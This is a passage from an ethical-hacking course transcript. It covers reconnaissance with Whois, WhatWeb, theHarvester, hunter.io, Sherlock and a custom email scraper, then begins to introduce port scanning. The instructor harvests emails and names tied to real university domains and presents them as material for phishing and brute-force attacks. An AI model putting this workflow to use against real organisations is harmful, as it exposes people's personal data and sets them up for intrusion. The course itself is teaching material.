right here, we can get using a tool called Whois. Whois not only gives us an IP address of the specified domain, but it also gives us a bunch of other information about that domain. It is already installed in Kali Linux, so let's test it out. If I close this page and type in my terminal Whois, the same domain name, press enter, I will pretty much get the same information that I saw previously on that website. As we can see right here, we get those DNS servers, the registration date, modification date, expiration date. We get the physical address and some other things such as ID number, tax ID, which is not really of interest to us. And let us also test this tool on Facebook, since different websites might give different information. For example, if I do the same on Facebook, since it being a much bigger site, it will probably give us much more information as well. So let's type it, Whois, facebook.com. Press enter. Let me just enlarge the terminal so we can see everything clearly. And if I scroll all the way up, we get some name servers, text street, city, state, province, postal code. We also get some phone numbers right here. Here are some of the email addresses for the tech email. So we get another email address right here and even more phone numbers. We get the city, the street. If I go all the way up, we can see that this is a Whois response. So this all information is public to us. And this would be pretty much it. This is all the information we get for Facebook using Whois tool. And by the way, in real penetration tests that you will perform, all of the interesting information is something that you want to write down in a report. For now, we only saw how we can get basic information such as IP addresses, country origin, physical address and similar, but later during information gathering and scanning, we might find something that shouldn't be out there on the internet, and that would be called information disclosure. It is something that client doesn't want to be seen, but it is still publicly available. So anything that you might think is interesting, you would write down. Okay, great. Now we know how we can identify a target by getting its IP address, and also getting its physical address and some other interesting information as well. And even though this isn't really hard information to get, it is a good beginning. Let us see in the next video what else can we find out. Welcome back. Now we're going to discuss a tool called WhatWeb. This tool is used to gather information and to scan any website on the internet. So it is primarily used to scan websites, since this tool recognizes web technologies including web servers, embedded devices, JavaScript libraries, and many more things. They explain it really well on the website page for this tool. So we can read right here about all of the details that this tool has. We can notice they have over 1700 plugins, each one of them used to recognize something different. So they use these plugins to perform the scan on the website and discover what technologies does that website run. What is important for us is this second paragraph, since down here it tells us that default level of aggression called stealthy is the fastest and requires only one HTTP request of a website. Now what this simply means is that this WhatWeb tool has different levels for scanning. And the default level is the level of aggression that is called stealthy, which we can use on any website that we want. The other levels of scanning are more aggressive and should only be performed during penetration tests. So we should not use the more aggressive scans on the websites that we do not have permission to scan. We can, however, use the stealthy scan on any website that we want on the internet. And don't worry, we are going to see all of these options in just a second. For now, it's good that we know what we can or cannot do. So let's test this tool out in our Kali Linux. To do it, open up your terminal, and to check out all of the options we can do with WhatWeb, you can simply just type WhatWeb in your terminal and press enter. This will give you a smaller help menu with some of the basic features that WhatWeb has. As we can see, we can specify targets, which can be anything from URLs, host names, or IP addresses. Here is that aggression level, which we specify like this. There is the aggression level 1, which is stealthy, and the aggression level 3, which is aggressive. The default level is level 1, which is good to notice, so we don't want to change this if we scan a random website on the internet. We can also list all of the plugins that it uses, but we are not currently interested in this. And we can have also a verbose output. But these are just some of the options for the WhatWeb tool. To get even more available options with WhatWeb, we can type the command whatweb-help. Press enter, and this will give us a much larger help menu with all of the possible options that we can use for WhatWeb. And down here is the aggression level. We can see besides the stealthy that we're going to use on random websites, and besides the aggressive scan that you would use in a penetration test, there is even more aggressive scan called heavy, and it says right here, makes a lot of HTTP requests per target, URLs from all plugins are attempted. So this is basically the deepest scan that WhatWeb tool can perform on a website. Up here are also the targets, so we specify a target first, and if I go all the way down, you will notice right here we got some of the examples of usage of WhatWeb. So we can see right here that the most simple example is running WhatWeb and then the domain name. So for the first run, let us go with this one. We're only going to specify website as an option. So just type down here WhatWeb. And since we're using the aggression level 1, we can scan any website that we want. So I'm going to go with this one. And this is just another university website from my country. Feel free to scan any website that you want, or you can also go with this one if you'd like. If I press here enter, in just a few seconds we should get response for this website. And here it is, we already got something. We got 2 responses, as we can see by the links right here. The command has finished executing, so let us just go through these results and see what we got. It tells us that it most likely performed a redirect as soon as we tried getting this link. We can also see that we got the Apache web server. We even get the version, which is 2.4.6. We got some cookies right here, which the website uses. We got from which country it is, which type of HTTP server it uses. If I go down here is the IP address of this website. Here's the PHP version that they use. And the redirect location, if you remember I told you that it most likely redirected us to a different page. Here is to where it redirected us. And once we got redirected, we got the response of 200 OK. And this is just an HTTP response code, which tells us that we successfully loaded a page. We got the same Apache version, the Bootstrap version, which cookies it uses, Down here we got the country, and we also managed to extract some of the emails. As we can see down here, these are some of the emails from the page that belong to this domain. Down here we also see that it uses HTML5, which HTTP server it has, which Apache version it has, once again which PHP version, the IP address. It also uses jQuery, Lightbox, and a bunch of other things we can see right here. But I don't really like how this is outputted. It is hard to read. To output this a little bit prettier, we can use this verbose option that I saw in the help menu. Here it is. And what this verbose option does is it also includes plugin descriptions. It will also tell us for each plugin that the WhatWeb tool managed to discover, it will tell us what exactly that plugin is. So let's try it out. If I type WhatWeb and then the same website, but I add -v option at the end and press enter, it will pretty much give us the same result, just it will be outputted a whole lot better and easier to read. If I scroll all the way up to the beginning of the command, remember we got 2 responses. Here is the IP address, and this is the first request or first response, which tells us to move to the actual website, so the redirect response. We get all of this information that we got previously, but we also get this section right here which says detected plugins. And for example, if we didn't know what Apache was, we could read right here what Apache is. And down here we get the version that this website has of the Apache. We also get for cookies, same thing. For HTTP server, we can see which operating system, which Apache server it is, which PHP version it is. It tells us right here what PHP is, for example, if we didn't know. PHP is a widely used general purpose scripting language. Redirect location. So after this request, it redirects us to this location. And down here, we get the response 200 for the actual page. We get once again the country, the IP address, and all of the detected plugins. And we can read through this and discover what is this website running. And it is outputted a whole lot better and easier to read than the previous command. Okay, good. So we managed to get the information as to what a certain website is running, which technologies it has, and in the next video, we're going to deeply go into this tool and try to perform some of the more aggressive scans as well as experiment with some of the different options of WhatWeb as well. Welcome back. Let's continue with our WhatWeb tool. So in the previous video, we only saw how we can perform the basic stealthy scan on a certain website. Another thing that we can do with WhatWeb, besides testing a website, is to test a range of IP addresses all at once. So if I open up my terminal and I type WhatWeb --help once again to list out all of the available options and scroll all the way up, here under the targets we can see that we can specify URLs, host names, IP addresses, but we can also specify IP ranges. We can specify them like this or like this. Now to test this out, I'm going to scan my entire home network. And to know what range of IP addresses should I scan for my home network, I could type down here command ifconfig or sudo ifconfig, since remember, this requires root privileges. Press enter, enter our password, and we can see that my IP address is 192.168.1.4, and what's more important than the IP address in this case is the net mask. And my net mask is 255.255.255.0. The subnet mask right here means that only the last octet of my IP address is changeable, which is this last number. So these first 3 octets or these first 3 numbers never change in my home network. This also means that the range of IP addresses that belong to my network are going to be from 0 to 255. So basically the range of the IP addresses that my network can have is this one, 192.168.1.0 to 192.168.1.255. This is the range of my home network. So let me scan it. Now, for you, it might be different based on what type of network you got, but in most home networks the subnet mask is going to be this one. Therefore, just the last octet will be changeable for you. Now, before I actually run the scan, I don't have any websites hosted in my home network. But I do got some devices running something on port 80, and port 80 is an HTTP port that websites use to host their pages. So we should still get some result from scanning my network. Let us go delete this and type whatweb, and then the range of my home network. Let us go with 1 to 192.168.1.255. So this is the range of IP addresses that I want to scan, and all of them belong to my home network. And the good thing right here is that I can use whichever aggression level I want, since it is my own network. Let's test out aggression level 3. To do that, we can specify -- aggression and then 3. After it, we can also specify the -v option to better output all of this. And let's press enter. You will notice we're getting some of the results, but there is a lot of this error happening on the screen. Now, what this error right here is, let me just Control-C, since we're not going to wait for this to finish. And what this error is all of the hosts that it tried to scan but couldn't manage to. And the reason why it couldn't manage to scan these hosts is because they do not exist. I currently only have around 2 or 3 devices on my home network, and all of these other IP addresses are out of use. So let me go up here to see what it found. It found the result for the IP address 192.168.1.1, and this is my router. Down here we can see all of the plugins that it managed to detect for my router. We can see an interesting plugin which is password field. This is something that we would write down, since any password field that we find we can use later on in something like a brute force attack to try to guess the password and try to brute force the login credentials. But nonetheless, this is just a router, so we're not really interested in it at the moment. This is just an example of a test of how it would look like. And since I don't have any website on my home network, it didn't really give much result. We can see right here, here is another IP address that is active. It is 192.168.1.10, and this is an IP address of my laptop, which is currently up and running. It detected this HTTP server on it, but it got the status code of 403 forbidden. So it is not allowed to visit that page. Therefore, this is as much information as it managed to get. And all the other ones down here are simply just offline. Now, if you don't want this outputted, this red text, you can use the same command and at the end add -- no errors. What this no errors option does is it simply just doesn't print these offline IP addresses. Let's test it out. If I run the same command, just with no errors, you will see we are not going to get any red text anymore. It will only scan these 2 live IP addresses, which is my home router and the laptop, and that is basically it. That is everything that it will output. Okay, so it took just a few seconds to finish, and keep in mind that since we are running level 3 of aggression scan, it will take a little bit more time to scan something than with level 1, since it is performing a deeper scan than just the level 1 stealthy scan. Okay, so we ran this command, and we used the aggression level 3. We used -v to output all of the detected plugins as well as their description. And we used no errors to not print out these offline IP addresses. But what if we, for example, wanted to save this output that we got in a file for some future references? Well, if I type the command whatweb --help and I go through this help menu once again, I will get to this part which is logging. And down here we can see that there are a bunch of options that we can use to log our file or to save our file. So let's just go with the first one. Or we can even use the second one, which is to log verbose output. To do that, we use this option right here, and then equals, and then the file name that we want it to save to. So if I go down here, and another useful command, once you have a bunch of things happening in your terminal, and by bunch of things I mean just a bunch of text printed out, what we can do to get rid of this is run the command clear. This will clear our terminal, so we get much cleaner look. Now if I press upper arrow to find the command that we ran previously, and at the end I add log and then dash verbose equals, and here I can call the file results, for example. If I press here enter, now you will notice that besides of this outputting it to the terminal, it will also save it inside of a file. Let's wait for this to finish to check out the file that we got. Okay, so it finished. Let us clear the screen once again, and if I type ls right here, we will see our results file. Let's lower the terminal and open this file to see what it got saved, and if I enlarge it, we will see that we got our results saved for both IP addresses, for my laptop IP address and for my router IP address. Now, for your scan, if you scanned your home network, you will probably have more devices or less devices, or you might not get any result in case none of your devices is having an open port 80, or in case none of your devices is running an HTTP server. So don't worry if you didn't get any device. This is just an example to see that we can even run the ranges of IP addresses, and to test out this aggression level 3 scan, since we can only do it on the websites that we own or have permission to scan. Okay, great, so look at all of the commands that we crafted with all of these options right here. And this is just a part of this WhatWeb tool. You don't need to be learning all of these commands. You can always just run the help command and read through its help menu to discover what you want to run. We won't be going through all of these options in WhatWeb tool, since there is too much of them, but I encourage you to play with it a little bit and see if it has any other interesting options. Great! In the next video, we're going to see how we can harvest or gather as much emails as possible from just knowing a domain. See you there! Right now, we are going to see how we can gather emails for a certain company or a domain. Remember, people are always weak at security. If we manage to send some malicious program to someone working in a company, and they run that program, we got our way in. We can also use emails in something like a brute force attack. We can use them in the username fields. There are many ways this could be useful, but for now, let us just see how we can get them. Since emails are public information, we can test this on any domain we want. To get emails, we're going to check out two different options. A tool called The Harvester that's installed in Kali Linux, and a website called hunter.io. Let's start with Harvester first. So open up your terminal, and to just run the help menu from The Harvester, we can type the tool name. So just type The Harvester with capital H and press enter. And this will output us with a smaller help menu, just like the WhatWeb tool did once we specified its name. We get its banner and some of the options that we can run. It tells us, since we try to run it with just the name of the program, that there is an error, the following arguments are required. So we need to specify the domain. But before we specify the domain, let us just run the bigger help menu so we can see all of our available options. Okay, great, here it is. So we get the domain option, so we need to specify either a company name or domain name to search. This is the limit of search results, which is default equal to 500. And all of these other options are not really of interest to us besides this last source option. And this last source option we specify with -b, and we specify where we want to search for emails. Now we can either specify one of these. We can, for example, specify we want to search for Twitter, LinkedIn, Bing, Google, or we can simply just specify all, and it will go through all of these in search for usernames, hosts, and emails. So let's try it out. If I clear the screen, type dharvester, and first thing we need to specify is -d for the domain. And for this test, I will go with this domain right here, which is another university domain. You can go either with this one, or you can pick any website that you want and use it instead. So if I specify dharvester -d, then the domain name, the next option that I want to specify is -b, and remember, -b option is the source, so where we want to search for the emails, host names, and usernames. And let us for the first try specify all. And the last option is -l, which is the limit that is set by default to be 500, so we can either specify more than that or less than that, or we can simply just not specify -l at all, and it will just by default scan 500 results. So if we leave it just like this, and I press here enter, the running of this command will take some time. It will search for different results, it will search for host names, it will search for usernames, and it will also search for emails. As we can see down here, it says searching 300 results, and this will go up to 500 since we are using the default -l option, which is 500 results. And it seems that we already got some users found. Here are some of the names, as well as what do they do. So this is already some result for us. Let's just wait for all of this to finish, and then we will go through all of the results that we managed to gather. Okay, so it has finished. Let us check out what we got as an output. So it searched through a bunch of different platforms, as we can see, LinkedIn, VirusTotal, Yahoo, Twitter, but it didn't manage to find any results for these platforms. The only thing we got is these users right here. But this is not what we looked for. We wanted to find some email addresses or perhaps some usernames. There is one thing with this harvester tool. From my personal experience, this tool doesn't always work. There are days when it gives amazing result, but there are days when it doesn't find any emails or any hosts, just like it did in this case. As it says, failed to detect a valid IP address from this domain name. We also didn't get any emails. And I'm talking about scanning this same domain just on 2 different days. That's why it is always good to, in case you don't get any results for this tool right now, to scan it multiple times. So if I scan it once again, and instead of -b all, I will select -b and scan only from Google to see if I get any different results. And if we still don't manage to get any results, just try the same command either later or tomorrow, and I guarantee you it will usually give you a different result. As we can see, we didn't manage to find anything with this tool. That's why we got a second option, and that second option is a website hunter.io. So let's go and visit that website, open up your Firefox, and in the search bar up here, type hunter.io. It will automatically lead you to this website, and we can see right here we got this search bar where we specify a company domain and we click on find email addresses. But on this website you must first create an account, and you either have a free account or a paid account. Technically you can even search without creating an account, but it will only show you first 5 results and they will be half blurred. Let me show you. If I go here and type the same domain name that we used for Harvester, and let me just enlarge this a little bit so you can see in greater detail, and I click on find email addresses, it will show me first 5 results and they will all be blurred. Now you can technically try to figure out what these email addresses are, but they will be blurred nonetheless. And down here it also tells you how much results it managed to gather. It managed to gather 315 more results besides these 5 emails, and those results will be available if you get a paid account. With free account, however, let me show you how free account looks like. If I go in sign in, and I sign into my account, for you just go and create an account right here, and sign in into your free account. Once you create an account, you should be able to have about 50 searches per month with a free account, as it says right here. So we got 0 out of 50, and these monthly requests reset in about 1 month. And as I mentioned, even with free account, you also don't get all the results outputted, but at least the emails that it gives you are not blurred. Let's test it out. If I type the domain name that we used this entire video and click on search, right now I managed to get some of the results right here. So I get up to 10 results with its email addresses and with their names. So we got the name and we also got the email addresses. We get right here which pattern it used to find email addresses, and all of these email addresses are also split into different sections. So if I click on IT engineering, I will even get what type of work does this person do: project advisor, IT engineering, production engineering, technical editor, as well as their email addresses. We also get from which sources we managed to get these emails. And if I go to all right here and I remove this IT engineering, down here we will also get that there are 310 more results for this domain name. So it is completely up to you whether you think you should get paid version for this. Just keep in mind that with the paid version you get much more results than with the free version. The bad side about the paid version is that it isn't cheap at all. If I go to my account up here and I click on subscription, I can see down here which plan choices I have available to purchase. And you can see 1000 requests per month will be around 50 euros per month. So this is completely up to you, but nonetheless, what we did learn in this video is different ways to gather emails about a certain domain. And I encourage you to also later try out this Harvester tool once again, because it does know to give really good results once it works. And one more thing is that at the end of this section, I will give you a tool that is coded in Python 3 that will be able to gather even more emails from a specified domain. So it will be even better than these two options that I showed you right here, and it will be our own tool. I will give you its code and also show you how to run it and how it works. Okay, good. In the next video, we're going to see how we can install some additional tools that we might need for information gathering. See you there. Okay, so for now, we took a look at a couple of tools used for information gathering, but what happens if some of the tools stop working? Or if they get outdated? What are we going to do? We cannot depend on certain tools. If a tool breaks, we must find our way around to do the task either using other tool or by creating that tool ourselves. Well, luckily, there are a lot of tools available for us to download online. And we cannot cover all of them, but what is important to cover is how we can download them. So, in this video, we're going to be searching for an information gathering tool that we can download online and then run in Kali Linux. And the best place where we can find those to download is GitHub. Most of you, if you are either a developer or a programmer, are already familiar with GitHub, and for those of you who don't know what GitHub is the world's largest community of developers that build and share their software. So let's see how we can download some additional tools from there. First of all, open up your Firefox, and when we download tools, we either know exactly which tools we want to download, so we search them by their name, or we have no idea what tools even exist. And this is the case where we don't even know what we want. We only know that we're looking for a tool used for information gathering. So let's just type that. In search bar, type information gathering tools GitHub. Up here, information gathering tools GitHub. Press enter. Okay, so let's just click and go with the first link. Information gathering tools. Make sure that it is from the GitHub page. And down here it will output us with a bunch of different tools that are used for information gathering. As we can see in the description, scan all possible TLDs for a given domain name, information gathering, website reconnaissance. This is a program to detect probability of admin page. And we got a bunch of different tools. If we go to some other links, we will also see some other tools available. So from the second link, we get the Sherlock, the Photon, F-Society, Pen Testing Bible. If I go all the way down, here is the Harvester. Remember this tool we used in the previous video. And by the way, if you didn't test out once again whether you managed to get some of the results with it, try it out right now. And down here, we will get Discover, which is also a known tool, Raccoon, Striker, Red Hawk, SandMap, and a bunch of others as well. And let's just go with any one of them. Let's just go with this one. Let us read the description. It says, all-in-one tool for information gathering, vulnerability scanning, and crawling. A must tool have for all penetration testers. Okay, so it seems interesting. Let us click on it. Click on Red Hawk. And here is the page of the tool. These are all of the files that the tool has. We can see them right here. Down here we got README. This is what we can perform with Red Hawk, so we can read what are our available options with it. And down here, released versions, changelog. Down here we also get how we can install it, how to configure it, and we get usage. Now, sometimes you will need to install some of the requirements that the tool needs in order to run. And you can almost always find the commands that you must run on this tool page. So, as we can see right here, we got the usage and installation, so all we need to do is follow both of them. And different tools might need different requirements, but this is something that you will get better at the more tools you install. However, to just download a tool from GitHub, you will always use the same command, and for this command, what we need to do is we need to copy the link to this tool. So copy up here, this link, right click, copy. Let us lower this page and open our terminal. And the command is git clone. And by the way, make sure that you're in the /desktop directory before you run this. Then type git clone, space, and then paste the link and press enter. And this is the command that we use to download a tool from GitHub. As we can see right here, it downloaded all of the files, and right now on our desktop we got the folder called Red Hawk, which is our tool. And also keep in mind that sometimes once you're searching for a tool, you might need to download multiple different tools before you run into a good one. So let's test this Red Hawk tool out. Let's see whether it is any good. To run it, well, we don't know how to run it, but we can go to the Red Hawk directory and see what files we got right here. So we got some PHP configuration files, functions, PHP. These are all of the files that we really are not interested in at the moment. If there was, for example, a usage file, we would most likely want to read that in case the tool is complicated. But for now, we got this redhawk.php file. And out of all of these files, this is the file that seems to be the tool. So how can we run this? Well, first we notice what type of file it is. It is a PHP file. So to run it, we must type PHP and then the file name. If it was, for example, a Python file, we would type Python and then the file name. So depending on which file type it is, we run it like this, so PHP, redhawk.php, and press enter. It will load this with its banner, and it tells us right here that some of the modules are missing, and it tells us that we can try fix command, or we can simply just install it ourselves using terminal. So let's see whether this tool will install it for us. If I type fix, checking if curl module is installed, curl module not installed, and installing curl operation requires sudo permission, so you might be asked for password. This asks us for sudo password, and let's input it. And it seems to be downloading the curl module for us automatically, and we don't need to run other commands. It is also installing the second thing that I'm missing. So let's just wait for this to finish. And it tells us right here, job finished successfully. Please restart Red Hawk. So let's clear the screen and run once again PHP Red Hawk, and right now we don't get any error messages right here. It only asks us which website we want to scan. So let's just go with Google, why not? Let's see what are the available options that we have. Enter 1 for HTTP or enter 2 for HTTPS, and since Google is HTTPS of course, we will select 2. And here are all of the available options that we can use with our RedHawk. Basic Recon, site title, IP address, Cloudflare detection. So let's see just the basic recon of Google. If I type number 0, it should perform the basic recon. And here are some of the basic output for Google. So we got site title to be Google, IP address, web server, Cloudflare, and it seems to be stuck at Cloudflare. So let's just Control-C it. It could be just a bug. And let's run it once again. Type google.com. Type 2 for HTTPS, and let's go once again with 0, just to see whether it will perform it correctly right now. And never mind, it seems to be stuck at Cloudflare once again. So let's just go with other options and test them out. Now this is what I'm talking about. Maybe if you don't like this tool, maybe you want to consider going and finding some other one. But for now we only tested one of the options, so let's go with other ones as well and see what else can we get. The Whois lookup, let's go with that one. And we get the Whois response for our Google. Good, so this option seems to work. It tells us scanning complete, press enter to continue, so let's continue and let's go with Geo IP lookup. This should tell us the coordinates of the Google, and it does tell us the country, the IP address, the latitude and longitude, but city and state seems to be unavailable. Let's go with another option. We got grab banners, DNS lookup, subnet calculator, Nmap port scan, and this option right here is something that we are not going to run right now, since this is something that we cover in the scanning section. The subdomain scanner is also something that we are not going to be doing right now. These options as well, so these are just some of the advanced options that we are going to cover later on, so we won't be running them at the moment. We can go with, for example, DNS lookup, to check out which DNS service it has, and here is the output. So this tool seems to be pretty good. It does give us some of the information for Google. Now of course there are other options that we didn't run and that I would advise you not to run, since some of them can be considered advanced scanning methods. But nonetheless we will be covering them in the next section. So for now on, what we did is we managed to find a random tool on GitHub, install it and get it to work. We also tested it out, and it did give us some of the information. Now, what I want you to do for the next video is try to download the same way a tool called Sherlock. It is also a tool from GitHub. We saw it up here. If I go one step back to this page, the first tool that we saw was, I believe, called Sherlock. Try to download this tool. It is a tool that is used to discover different accounts on different platforms based on the usernames that you specify. Try it out and we will see how to download it and run it in the next video. Have you managed to download the Sherlock tool? If you did, congrats. If not, let's see how we can get it and what we can do with it. So if you haven't already, open up your Firefox and type Sherlock GitHub. The first link should be the original link of the tool that should lead you to this GitHub page. Once you're on the Sherlock page, you should see all of the files that belong to this tool. Down here, we will see the installation, so how we can install the tool. And right here, we will also see the usage. But before we check out the usage of the tool, let us go and download Sherlock first. So we already know how we can do that. Just copy the link to this tool, open up your terminal, and type git clone, and then paste the link of the tool. Press enter, and this should automatically download the tool for us. We can see this tool is a lot larger than the RedHawk since it took a little bit more time to download. And once it finishes downloading, we should type ls and we will see the Sherlock folder inside of our desktop directory. Let us navigate to that folder. And if I type ls in it, we should see all of these files that we saw on this page right here. Good. Let us close this. We are not going to be checking anything on this page anymore. And outside of all of these files, we want to go to this Sherlock folder. So if I go cd Sherlock and type ls right here, here is the tool. It is a Python tool, and we know that this is the tool since it is named sherlock.py. All these other Python files are simply just the additional files for this tool that is probably getting imported inside of this. So to run this, we can type the command python3 and then sherlock. No module named tool request. So this could either mean one of two things. This tool is supposed to be ran with Python 2, or this module does not exist for Python 3. And if you get an error that some module doesn't exist, what you want to do is you want to type pip3 install and then the name of the module. So I can just copy this, copy selection, and paste it right here. Let's see whether we can download this module. And it seems that the requirement has already been satisfied, so it could be that we're missing this module for Python 2. Let's try first to run it once again, after running this command. So this command actually did something. As it says, it performed building of wheels for collected packages, and it managed to resolve our problem. So now we can run the tool. It does give us an error right here, but this is just a syntax error that tells us that some arguments are required, such as usernames. So let me just clear the screen and type python3 sherlock.py once again. And here are all of the available options that we can use with Sherlock. But the basic usage of this tool is specifying python3 sherlock.py, and then after it comes a username. What this tool will do with that username is it is going to search through a bunch of different platforms for the same username. So if you, for example, had a username that you discovered for some domain or for some company, and you wanted to discover whether that person has some other accounts with the same username, you can throw it in this tool and it will find you all the other accounts that have that same username. What are we going to use here? Do you remember our harvester tool? It didn't work once we tried it out, but what I did a few minutes ago is I ran the command on the same domain that didn't work previously once we tried it before. I also put the source to be Twitter, so it managed to find 10 users that have Twitter, and these users are discovered from this domain. If I go and copy any one of them, and let's go with keyframes, and throw it in this tool, I should be able to discover other accounts that have this same username. So here we already got this one. And by the way, this is not really a unique username, so it might be that this account, for example, doesn't belong to the same person. But if you were to find a unique username, such as, for example, maybe this one, or even this one, and throw it inside of this tool, and you manage to discover some other accounts, those accounts will probably belong to that person. But if the username was something like media, and we put media inside of the Sherlock tool, well then most likely all of those accounts will not belong to the same person. Okay, so here is our output, and it managed to discover a bunch of other accounts that also have the same username. So let's try with another username. If I go all the way down and Control-C this, then clear the screen, and let's pick, for example, this username, copy it, and I throw it inside of this tool once again. Let us see whether we manage to find another platform that has this same account. So it seems that most of them are giving us not found. Let's wait for final results, and here they are. So we already get the output for Wikipedia, we got our username that we discovered from the Twitter profile. If I go all the way up, let's see whether we manage to find something else, and it seems that all of the others have not found. And here is also a Catch Me profile with the same username, so that is another result that we managed to gather. Okay, great, so that would basically be it for this tool. Now, another thing that this tool does is it also saves our results in a file. So if I go and Control-C this, clear the screen, and type ls. Oh, never mind, it seems that it didn't save it. Maybe if we specified an option for it to save. Let us run the help menu. No such file or directory. Yeah, that's because we are in a wrong folder. So let me go to the Sherlock folder and run the Python 3 sherlock.py --help. And yeah, we actually probably had to run this output command, and after the output we specify the file name, and the output of the result will be saved to this file. So it doesn't save it by default. And you can also check out other options as well, but the purpose of this and previous video was to figure out how we can download additional tools. You might never use this tool again, or you might use it every time. It depends on which type of penetration tests you perform and what kind of strategy you plan for your attacks. But it is always good to have a bunch of different tools and options that you can use. Now that we know how we can download tools from GitHub, every time a certain tool breaks, or you don't get the desired result with some tool, you can go to GitHub and try to find a similar tool that will give you better results. Okay, good. So, in the next video, I will give you a bonus tool that I created in Python 3 that will be able to gather much more emails than the already built-in tools in Kali Linux. Welcome back, and in this bonus video we're going to be covering the tool that I created in Python 3 that is used to gather emails. Now, even though later in the course we will be coding some of our own Python tools, this is one that we will not code, so we will just see how it works. I will explain how it works, of course, and we are going to see how many emails it can gather. So this is the tool right here called Email Scraper, and you will have this to download in the resources of this lecture. But let me show you how you can transfer it on the Kali Linux desktop. If you go up here on the devices and you go on drag and drop and click on bidirectional, then anything that you have on your desktop, since I had the program right here, if you go and drag it to your Kali Linux machine, it will get moved onto your Kali Linux desktop. As you can see right here, this folder already contains this file, since I already have it on my desktop, so I will just skip this. But you, after setting this to bidirectional, can transfer any file from your host desktop to your Kali Linux desktop. Okay, good. Now that we know how we can transfer it, let us see what this tool is and how we can run it. So just to check out the code of this tool real quick, let us double click on it, and let me enlarge all of this. And what this tool essentially does is it asks us for the URL, and we provide it with the URL of a certain domain name. Then what this tool does is it tries to extract all of the emails that are in the HTML page of the URL that you specified. But what it also does is it tries to crawl within other URLs that are found inside of that page. For example, this count variable right here, that is equal to 100, means that we will be searching for emails in 100 different links. So you specify the main URL, then it goes through that URL, it extracts all of the emails, but it also extracts all of the other URLs that are leading to different pages. Then it goes to those different pages and performs the same thing. It tries to find the emails, and it also finds more URLs. And it does that until it reaches 100 URLs. This is a number that you can change if you want to, so you can set this to be lower or higher depending on how much results you want to find. Down here we can see that it is finding those emails using regex. So this is the pattern that we are searching for, and don't worry if you don't understand any of this. Regex is just a way for us to find certain patterns in a lot of text. So for example, this is a pattern that will allow us to find emails in the HTML code of the page. And then we, at the end of this, print all of the emails that we found. So that is the basic principle behind this tool. Let us see how it runs and whether we manage to find more emails than we did with hunter.io and the harvester. So let's close this, go to our terminal, find where you have this file downloaded, and I have it on my desktop. And to just run it, we can type Python 3 and then the name of the file. It will tell us enter target URL to scan, and here I'm going to specify the full URL to the same domain name that we used for the harvester and hunter.io, just so we can compare how many results we get with this tool and how many results we got with hunter.io and the harvester. So if I type the domain name and press here enter, this will go and process 100 links. And depending on whether you change that number, it might be higher or lower. And at the end of processing these links, it will print out all of the emails that it managed to find. So if you remember, with hunter.io, the website that we used, with the free account we managed to gather 10 different emails. With the Harvester, first time we didn't manage to get any email, but after running it a couple of times we might be able to get around 10 to 15 different emails with the Harvester. But let's see how many this tool will find. So let's just wait for this to finish and I will get back to you as soon as it's done. Okay, so the tool has finished scanning and here are all of the emails that we managed to find. You can see there is at least 100 or 150 of them and they all belong to the same domain. Now, we might occasionally find some email that doesn't belong to this domain, and we saw one down here, I believe. Let me just find it. This one. It doesn't have the domain name inside of the email, but all of the others do. And we got at least 5 to 10 times more results than we managed to get with the Harvester, which is Kali Linux tool, or with the free account of hunter.io. And here are all the links that it processed, so it clicked on all of these links and it tried to extract as much emails as it could from these links. Cool, right? So now you have a tool that will be able to capture a lot of emails based on the specified domain. Just make sure that once you run the tool, you specify HTTP or HTTPS before the domain name. Okay, so this tool is now yours. Feel free to use it as much as you want. And later on in the course, we will also be coding our own Python tools. They will not be some too advanced tools, but we will be covering basics of creating our own hacking tools, which is something that every hacker should at some point of their journey learn. Great. So now that we finished with the information gathering section, we are ready to start off with scanning section. And you might be wondering, how are you going to be able to follow the scanning section and all the other sections, since you don't really have permission to scan any website? Don't worry, there are a lot of free vulnerable machines and websites that we can download and practice on them. And we're going to be seeing how we can find them and install them inside of our VirtualBox. So we will have our own vulnerable lab where we can practice our hacking. So thank you for watching this section and I will see you in the next one. Welcome back. Here we are, ready to start our scanning phase. We have covered the information gathering, which was first phase of penetration testing, and now we will proceed with the second stage by scanning our target and trying to get even more information about it. Now, the difference between information gathering and scanning is that scanning is performed on a much deeper level. And also, while in the first phase we gathered all kinds of information such as emails, phone numbers and a bunch of other things, in the scanning we are mainly focused on technology side. So we want to find out as much as we can about our target's technical aspect. We're going to talk about in just a second as to what exactly are we looking for in this stage and what are all the goals of this stage. But first, you could be wondering, what are we going to scan? Since remember that scanning is something that we are not allowed to do on any target that we want. Don't worry, for this stage and any future stage from now on, we're going to be using vulnerable virtual machines. There are lots of paid vulnerable virtual machines that you can buy and test on, but for this course I will be showing the free ones. So all of us can download them, install them and then try to hack them. All of these virtual machines are going to be running some outdated vulnerable software that we will be able to exploit in the third stage, and they will also require very little hardware power. So all of us will be able to run them while also running Kali Linux. And keep in mind that penetration testing process will look exactly like it would look in real world, if you were to test some website or some network. The only difference is that right now we know that these machines are vulnerable, since I just told you, and in real world you wouldn't essentially know that before testing them. However, just knowing they are vulnerable doesn't really help us, as we need to figure out in what way are they vulnerable and how can we take advantage of that. Scanning will help us with this. We will be using our Kali Linux machine to scan these machines. And by scanning these machines, what I really mean is we're going to directly exchange packets with our target, and once that target sends packets back to us, hopefully it will discover something about the target machine that we will find useful. And what we will be sending to the target are TCP and UDP packets. TCP and UDP are just protocols that are used for sending bits of data, also known as packets. And we will discuss them in a little more detail in the next video. For now, just think of them as different communication protocols that will allow us to get information from our target. I keep talking about information and scanning and all of that without actually explaining what do I mean by scanning and getting information. What are the goals of this? What are we looking for exactly? Well, we're looking for open ports. And I don't mean USB ports or some physical ports, I mean we're looking for virtual open ports that every machine has, and it uses them to host their software and communicate with other machines over internet. For example, you watching this over internet on a website means that the machine that's hosting this website has port 80 open. Why port 80? Well, port 80 is used to host a web server. It is used for HTTP, and it's also known as HTTP port. So every time you visit a website, you are essentially making a connection to that machine hosting that website on port 80 or on port 443, since port 80 is used for HTTP and port 443 is used for HTTPS. And HTTPS is just a secure version of HTTP. These are the two most usual ports that target that you're scanning externally will have open. And by externally scanning, I mean that you're scanning it while not being in the same network as the target. An example would be you scanning some website from your home. And a port that could sometimes be open if you're scanning internally, which means either scanning machines on your network or you're performing network penetration testing inside of some company, you could, for example, find port 21 to be open. This is an FTP port and it's used for file transferring. FTP stands for File Transfer Protocol. These are just two of the ports and there are a lot of them. You could, for example, have port 22 open, which is SSH port or Secure Shell port. It is used to log into the target machine and execute commands on it remotely. We could also have, for example, port 53 open, which is DNS port. Or we could have port 25 open, which is SMTP port. So there are a lot of ports. Matter of fact, every machine has 65,535 ports for both TCP and UDP. And if there is just one open port with one vulnerable software running on that open port, then 